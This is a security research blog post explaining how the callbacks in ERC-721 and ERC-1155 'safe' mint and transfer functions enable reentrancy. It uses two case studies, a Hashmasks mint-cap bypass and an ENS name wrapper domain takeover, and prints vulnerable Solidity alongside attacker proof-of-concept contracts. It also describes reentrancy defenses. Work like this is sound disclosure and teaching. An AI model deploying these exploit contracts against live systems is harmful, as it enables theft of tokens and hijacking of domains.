The Dangers of Surprising Code

8.13.2021 | samczsun

If you work in software engineering, odds are you’ve heard of at least one software engineering principle. While I wouldn’t advocate for religiously following every principle to the letter, there are a few that are really worth paying attention to.

The one I want to talk about today is the principle of least astonishment. It has a fancy name but is a really simple idea. All it says is that when presented with code that claims to do something, most users will make assumptions regarding how it behaves to get that thing done. As such, your job as the developer is to write your code to match those assumptions so that your users don’t get a nasty surprise.

This is a good principle to follow because developers like making assumptions about things. If you export a function called calculateScore(GameState), a lot of people are going to reasonably assume that the function will only read from the game state. If you also mutate the game state, you’ll leave a lot of very confused people trying to figure out why their game state keeps getting corrupted. Even if you put it in the documentation, there’s still no guarantee that people will see it, so it’s best to just ensure your code isn’t surprising in the first place.
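In Solidity, the language used throughout the rest of this post, this particular expectation can even be enforced by the compiler: marking a function view makes any state mutation a compile-time error. A minimal sketch (the GameState struct and scoring formula here are made up for illustration):

```solidity
pragma solidity ^0.8.0;

contract Game {
    struct GameState {
        uint256 level;
        uint256 kills;
    }

    GameState public state;

    // `view` promises callers that this function only reads state.
    // Writing to `state` in here would be a compile-time error, so the
    // "this function doesn't mutate anything" assumption is enforced
    // by the compiler rather than by documentation.
    function calculateScore() public view returns (uint256) {
        return state.level * 100 + state.kills * 10;
    }
}
```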

Safer Is Better, Right?

When the ERC-721 standard was being drafted, back in the beginning of 2018, a suggestion was made to implement transfer security to ensure that tokens wouldn’t be stuck in recipient contracts that weren’t designed to handle them. To do this, the proposal authors modified the behavior of the transfer function to check the recipient for whether they were capable of supporting the token transfer. They also introduced the unsafeTransfer function which would bypass this check, should the sender so desire.

However, due to concerns about backwards compatibility, the functions were renamed in a subsequent commit. This made the transfer function behave the same for both an ERC-20 and an ERC-721 token. However, now the recipient checking needed to be moved elsewhere. As such, the safe class of functions was introduced: safeTransfer and safeTransferFrom.

This was a solution for a legitimate problem, as there have been numerous examples of ERC-20 tokens being accidentally transferred to contracts that never expected to receive tokens (one particularly common mistake was to transfer tokens to the token contract itself, locking it forever). It’s no surprise then that when the ERC-1155 standard was being drafted, it took inspiration from the ERC-721 standard by including recipient checks not only on transfer but on mint as well.

These standards mostly sat dormant for the next few years while ERC-20 maintained its popularity, but a recent spike in gas costs, along with surging interest in NFTs, means that the ERC-721 and ERC-1155 standards have seen a corresponding spike in developer usage. With all this renewed interest, it sure is fortunate that these standards were designed with safety in mind, right?

What Does "Safe" Actually Mean?

Ok, but what exactly does it mean for a transfer or mint to be safe? Different parties have different interpretations of safety. For a developer, a safe function might mean that it doesn’t contain any bugs or introduce additional security concerns. For a user, it could mean that it contains additional guardrails to protect them from accidentally shooting themselves in the foot.

It turns out that in this case, these functions are more of the latter and less of the former. This is especially unfortunate because given the choice between transfer and safeTransfer, why wouldn’t you pick the safe one? It’s in the name!

Well, one reason might be our old friend reentrancy, or as I’ve been trying my hardest to rebrand it to: unsafe external calls. Recall that any external call is potentially unsafe if the recipient is attacker-controlled because the attacker may be able to cause your contract to transition into an undefined state. By design, these “safe” functions perform an external call to the recipient of the tokens, which is often controlled by the sender during a mint or transfer. In other words, this is practically a textbook example of an unsafe external call.
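To make the hazard concrete, here’s a simplified sketch of the callback a “safe” ERC-721 mint or transfer performs. The IERC721Receiver interface and the revert message follow the ERC-721 standard; the surrounding contract is a stripped-down illustration, not any particular implementation:

```solidity
pragma solidity ^0.8.0;

interface IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

contract SimplifiedERC721 {
    mapping(uint256 => address) public ownerOf;

    function _safeMint(address to, uint256 tokenId) internal {
        ownerOf[tokenId] = to;

        // The "safe" part: if the recipient is a contract, hand control
        // over to it and ask whether it accepts the token. If `to` is
        // attacker-controlled, the attacker now runs arbitrary code
        // while this contract is mid-operation -- a textbook unsafe
        // external call.
        if (to.code.length > 0) {
            require(
                IERC721Receiver(to).onERC721Received(msg.sender, address(0), tokenId, "") ==
                    IERC721Receiver.onERC721Received.selector,
                "ERC721: transfer to non ERC721Receiver implementer"
            );
        }
    }
}
```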

But, you might ask yourself, what’s the worst that could happen from allowing a recipient contract to reject a transfer that they weren’t able to process? Well, allow me to answer that question with two quick case studies.


Hashmasks

Hashmasks are NFTs with a limited supply. Users were able to purchase up to 20 masks per transaction, although they’ve been sold out for months already. Here’s the function to buy masks:

    function mintNFT(uint256 numberOfNfts) public payable {
        require(totalSupply() < MAX_NFT_SUPPLY, "Sale has already ended");
        require(numberOfNfts > 0, "numberOfNfts cannot be 0");
        require(numberOfNfts <= 20, "You may not buy more than 20 NFTs at once");
        require(totalSupply().add(numberOfNfts) <= MAX_NFT_SUPPLY, "Exceeds MAX_NFT_SUPPLY");
        require(getNFTPrice().mul(numberOfNfts) == msg.value, "Ether value sent is not correct");

        for (uint i = 0; i < numberOfNfts; i++) {
            uint mintIndex = totalSupply();
            if (block.timestamp < REVEAL_TIMESTAMP) {
                _mintedBeforeReveal[mintIndex] = true;
            }
            _safeMint(msg.sender, mintIndex);
        }

        /**
         * Source of randomness. Theoretical miner withhold manipulation possible but should be sufficient in a pragmatic sense
         */
        if (startingIndexBlock == 0 && (totalSupply() == MAX_NFT_SUPPLY || block.timestamp >= REVEAL_TIMESTAMP)) {
            startingIndexBlock = block.number;
        }
    }

If you didn’t know what to look for, this function might seem perfectly reasonable. However, as you might have predicted, there’s something sinister hidden inside that _safeMint call. Let’s take a look.

    function _safeMint(address to, uint256 tokenId, bytes memory _data) internal virtual {
        _mint(to, tokenId);
        require(_checkOnERC721Received(address(0), to, tokenId, _data), "ERC721: transfer to non ERC721Receiver implementer");
    }

For safety, this function performs a callback to the recipient of the token to check that they’re willing to accept the transfer. However, we’re the recipient of the token, which means we just got a callback at which point we can do whatever we like, including calling mintNFT again. If we do this, we’ll reenter the function after only one mask has been minted, which means we can request to mint another 19 masks. This results in a total of 39 masks being minted, even though the maximum allowable was only 20.
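Sketched as a hypothetical attacker contract (the IHashmasks interface is illustrative, and a real exploit would also need to fund the contract correctly, since getNFTPrice() changes across Hashmasks price tiers):

```solidity
pragma solidity ^0.8.0;

interface IHashmasks {
    function mintNFT(uint256 numberOfNfts) external payable;
    function getNFTPrice() external view returns (uint256);
}

contract MaskBuyer {
    IHashmasks public immutable masks;
    bool private reentered;

    constructor(IHashmasks _masks) {
        masks = _masks;
    }

    // Fund this contract with enough ETH for 39 masks, then call buy().
    function buy() external payable {
        // Start a 20-mask purchase; the first _safeMint calls back into us.
        masks.mintNFT{value: masks.getNFTPrice() * 20}(20);
    }

    function onERC721Received(address, address, uint256, bytes calldata)
        external
        returns (bytes4)
    {
        if (!reentered) {
            reentered = true;
            // Only 1 of the original 20 has been minted so far, but the
            // per-transaction cap only checks numberOfNfts <= 20, so we
            // can start a second 19-mask purchase: 20 + 19 = 39 total.
            masks.mintNFT{value: masks.getNFTPrice() * 19}(19);
        }
        return this.onERC721Received.selector;
    }

    receive() external payable {}
}
```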

ENS Name Wrapper

More recently, Nick Johnson from ENS reached out about taking a look at their work-in-progress name wrapper for the ENS. The name wrapper allows users to tokenize their ENS domains in a new ERC-1155 token which provides support for fine-grained permissions and a more consistent API.

At a high level, in order to wrap an arbitrary ENS domain (more specifically, any domain that isn’t a 2LD .eth domain) you must first approve the name wrapper to access your ENS domain. Then you call wrap(bytes,address,uint96,address) which both mints an ERC-1155 token for you and also takes custody of the underlying ENS domain.

Here’s the wrap function itself, it’s fairly straightforward. First, we call _wrap which does some logic and returns the hashed domain name. Then we ensure that the transaction sender is indeed the owner of the ENS domain before taking custody of the domain. Note that if the sender does not own the underlying ENS domain, then the entire transaction should revert, undoing any changes made in _wrap.

    function wrap(
        bytes calldata name,
        address wrappedOwner,
        uint96 _fuses,
        address resolver
    ) public override {
        bytes32 node = _wrap(name, wrappedOwner, _fuses);
        address owner = ens.owner(node);

        require(
            owner == msg.sender ||
                isApprovedForAll(owner, msg.sender) ||
                ens.isApprovedForAll(owner, msg.sender),
            "NameWrapper: Domain is not owned by the sender"
        );

        ens.setOwner(node, address(this));
        if (resolver != address(0)) {
            ens.setResolver(node, resolver);
        }
    }

Here’s the _wrap function itself. Nothing special going on in here.

    function _wrap(
        bytes memory name,
        address wrappedOwner,
        uint96 _fuses
    ) private returns (bytes32 node) {
        (bytes32 labelhash, uint256 offset) = name.readLabel(0);
        bytes32 parentNode = name.namehash(offset);

        require(
            parentNode != ETH_NODE,
            "NameWrapper: .eth domains need to use wrapETH2LD()"
        );

        node = _makeNode(parentNode, labelhash);

        _mint(node, name, wrappedOwner, _fuses);
        emit NameWrapped(node, name, wrappedOwner, _fuses);
    }

Unfortunately, it’s the _mint function itself where unsuspecting developers may be in for a nasty surprise. The ERC-1155 specification states that when minting a token, the recipient should be consulted for whether they’re willing to accept the token. Upon digging into the library code (which is lightly modified from the OpenZeppelin base), we see that this is indeed the case.

    function _mint(
        bytes32 node,
        bytes memory name,
        address wrappedOwner,
        uint96 _fuses
    ) internal {
        names[node] = name;

        address oldWrappedOwner = ownerOf(uint256(node));
        if (oldWrappedOwner != address(0)) {
            // burn and unwrap old token of old owner
            _burn(uint256(node));
            emit NameUnwrapped(node, address(0));
        }
        _mint(node, wrappedOwner, _fuses);
    }

    function _mint(
        bytes32 node,
        address newOwner,
        uint96 _fuses
    ) internal virtual {
        uint256 tokenId = uint256(node);
        address owner = ownerOf(tokenId);
        require(owner == address(0), "ERC1155: mint of existing token");
        require(newOwner != address(0), "ERC1155: mint to the zero address");
        require(
            newOwner != address(this),
            "ERC1155: newOwner cannot be the NameWrapper contract"
        );
        _setData(tokenId, newOwner, _fuses);
        emit TransferSingle(msg.sender, address(0x0), newOwner, tokenId, 1);
        _doSafeTransferAcceptanceCheck(msg.sender, address(0), newOwner, tokenId, 1, "");
    }

But what good does this do for us, exactly? Well, once again we are presented with an unsafe external call that we can use to perform reentrancy. Specifically, notice that during the callback we own the ERC-1155 token representing the ENS domain, but the name wrapper hasn’t yet verified that we own the underlying ENS domain itself. This allows us to operate on the ENS domain without actually owning it in the first place. For example, we can ask the name wrapper to unwrap our domain, burning the token we just minted and getting the underlying ENS domain.

    function unwrap(
        bytes32 parentNode,
        bytes32 label,
        address newController
    ) public override onlyTokenOwner(_makeNode(parentNode, label)) {
        require(
            parentNode != ETH_NODE,
            "NameWrapper: .eth names must be unwrapped with unwrapETH2LD()"
        );
        _unwrap(_makeNode(parentNode, label), newController);
    }

    function _unwrap(bytes32 node, address newOwner) private {
        require(
            newOwner != address(0x0),
            "NameWrapper: Target owner cannot be 0x0"
        );
        require(
            newOwner != address(this),
            "NameWrapper: Target owner cannot be the NameWrapper contract"
        );
        require(
            !allFusesBurned(node, CANNOT_UNWRAP),
            "NameWrapper: Domain is not unwrappable"
        );

        // burn token and fuse data
        _burn(uint256(node));
        ens.setOwner(node, newOwner);

        emit NameUnwrapped(node, newOwner);
    }

Now that we have the underlying ENS domain, we can do whatever we want with it, such as register new subdomains or set the resolver. When we’re done, we just exit the callback. The name wrapper will fetch the current owner of the underlying ENS domain, which is us, and complete the transaction. Just like that, we’ve taken temporary ownership of any ENS domain the name wrapper is approved for and made arbitrary changes to it.
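Putting the pieces together, the attack can be sketched as a hypothetical contract like the following. The interfaces are simplified, and the "stolen" subdomain label is made up for illustration:

```solidity
pragma solidity ^0.8.0;

interface INameWrapper {
    function wrap(bytes calldata name, address wrappedOwner, uint96 _fuses, address resolver) external;
    function unwrap(bytes32 parentNode, bytes32 label, address newController) external;
}

interface IENS {
    function setSubnodeOwner(bytes32 node, bytes32 label, address owner) external returns (bytes32);
}

contract WrapperExploit {
    INameWrapper public immutable wrapper;
    IENS public immutable ens;
    bytes32 public immutable parentNode; // namehash of the victim domain's parent
    bytes32 public immutable label;      // labelhash of the victim domain's label

    constructor(INameWrapper _wrapper, IENS _ens, bytes32 _parentNode, bytes32 _label) {
        wrapper = _wrapper;
        ens = _ens;
        parentNode = _parentNode;
        label = _label;
    }

    function attack(bytes calldata victimName) external {
        // We don't own victimName, but wrap() only checks ownership
        // *after* _mint hands control to us via the ERC-1155 callback.
        wrapper.wrap(victimName, address(this), 0, address(0));
    }

    function onERC1155Received(address, address, uint256 id, uint256, bytes calldata)
        external
        returns (bytes4)
    {
        // We now hold the ERC-1155 token for a domain we never owned.
        // Burn it via unwrap(), making us the owner of the raw ENS name
        // (the wrapper can do this because it was approved by the victim).
        wrapper.unwrap(parentNode, label, address(this));

        // Make arbitrary changes as the owner, e.g. plant a subdomain.
        ens.setSubnodeOwner(bytes32(id), keccak256("stolen"), address(this));

        // When we return, wrap() resumes: ens.owner(node) is now us, so
        // its ownership check passes and it takes custody as planned.
        return this.onERC1155Received.selector;
    }
}
```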


Conclusion

Code that’s surprising may break things in catastrophic ways. In both of these cases, developers who reasonably assumed that the safe class of functions would be (at least as) safe to use instead inadvertently increased their attack surface. As the ERC-721 and ERC-1155 standards become more popular and widespread, attacks like these will likely become more frequent. Developers will need to consider the risks of using the safe class of functions and determine how the external call might interact with the code they’ve written.
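If you do need the safe variants, one common defense is an explicit reentrancy guard combined with the checks-effects-interactions pattern. A minimal sketch, modeled loosely on OpenZeppelin’s ReentrancyGuard (simplified here, not the library’s exact code):

```solidity
pragma solidity ^0.8.0;

abstract contract ReentrancyGuard {
    uint256 private _status = 1;

    // Reverts if a nonReentrant function is re-entered before it
    // finishes, e.g. from inside an onERC721Received callback.
    modifier nonReentrant() {
        require(_status == 1, "reentrant call");
        _status = 2;
        _;
        _status = 1;
    }
}

contract GuardedSale is ReentrancyGuard {
    uint256 public totalSupply;
    uint256 public constant MAX_SUPPLY = 100;

    // With nonReentrant, the Hashmasks-style reentry would revert.
    // Updating totalSupply before any external call (checks-effects-
    // interactions) independently closes the same hole.
    function mintNFT(uint256 numberOfNfts) external payable nonReentrant {
        require(numberOfNfts > 0 && numberOfNfts <= 20, "bad count");
        require(totalSupply + numberOfNfts <= MAX_SUPPLY, "exceeds supply");

        for (uint256 i = 0; i < numberOfNfts; i++) {
            uint256 mintIndex = totalSupply;
            totalSupply++; // effect recorded before the unsafe call
            _safeMint(msg.sender, mintIndex);
        }
    }

    function _safeMint(address to, uint256 tokenId) internal {
        // the external callback to `to` would happen here
    }
}
```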

Written by samczsun.
Sam is a Research Partner focused on Paradigm’s portfolio companies and research into security and related topics. Previously, Sam was a security engineer at Trail of Bits.

Disclaimer: This post is for general information purposes only. It does not constitute investment advice or a recommendation or solicitation to buy or sell any investment and should not be used in the evaluation of the merits of making any investment decision. It should not be relied upon for accounting, legal or tax advice or investment recommendations. This post reflects the current opinions of the authors and is not made on behalf of Paradigm or its affiliates and does not necessarily reflect the opinions of Paradigm, its affiliates or individuals associated with Paradigm. The opinions reflected herein are subject to change without being updated.